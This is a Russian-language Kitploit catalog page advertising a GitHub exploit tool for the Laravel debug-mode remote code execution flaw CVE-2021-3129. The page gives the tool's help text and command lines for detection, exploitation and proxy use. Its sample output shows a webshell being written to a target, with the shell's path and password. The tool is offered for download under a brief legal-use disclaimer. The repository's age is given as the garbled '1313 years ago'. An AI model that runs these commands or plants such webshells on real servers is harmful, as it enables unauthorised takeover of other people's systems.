Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ajisai-babu/cve-2021-3129-exp
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubajisai-babu/cve-2021-3129-exp

CVE-2021-3129-exp

Уязвимость RCE в режиме отладки Laravel (CVE-2021-3129) poc / exp

Репозиторий
1313 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость RCE в режиме отладки Laravel (CVE-2021-3129) poc / exp

Эксплойт / проверка CVE-2021-3129

  • Внимание ⚠️: Использование и обнаружение этой уязвимости отправляет несколько запросов, что может замедлить процесс.
  • Использование:
root@kitploit:~
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp

Laravel Debug mode RCE(CVE-2021-3129)POC & EXP

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定目标url地址
  -e, --exp             利用漏洞写入webshell,如不指定,则仅进行漏洞检测
  -p PROXY, --proxy PROXY
                        设置代理,如socks5://127.0.0.1:7890
  • Пример:
root@kitploit:~
# poc
python CVE-2021-3129.py -u http://xxxxx.com 
[✅]Обнаружена уязвимость! [🚩]url: http://xxxxx.com [❇️info]PHP версия:7.4.14 Путь сайта:/var/www/html Адрес сервера:172.17.0.2 Версия ОС:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64

# exp
python CVE-2021-3129.py -u http://xxxxx.com --exp                     
[✅]Обнаружена уязвимость! [🚩]url: http://xxxxx.com [❇️info]PHP версия:7.4.14 Путь сайта:/var/www/html Адрес сервера:172.17.0.2 Версия ОС:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64 
[OK] Успешно записан веб-шелл, адрес доступа http://xxxxx.com/shell.php , пароль whoami

# proxy
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890
  • Ссылки

    • https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g
    • https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
    • https://github.com/nth347/CVE-2021-3129_exploit
    • https://github.com/ambionics/phpggc
  • Условия использования

    • Данный инструмент предназначен только для законных действий по обеспечению безопасности корпоративных систем. При использовании данного инструмента для проверки вы должны убедиться, что такие действия соответствуют местным законам и нормативным актам, а также что вы получили все необходимые разрешения.
    • Если вы совершаете какие-либо незаконные действия при использовании данного инструмента, вы несете за это полную ответственность.
Скачать инструмент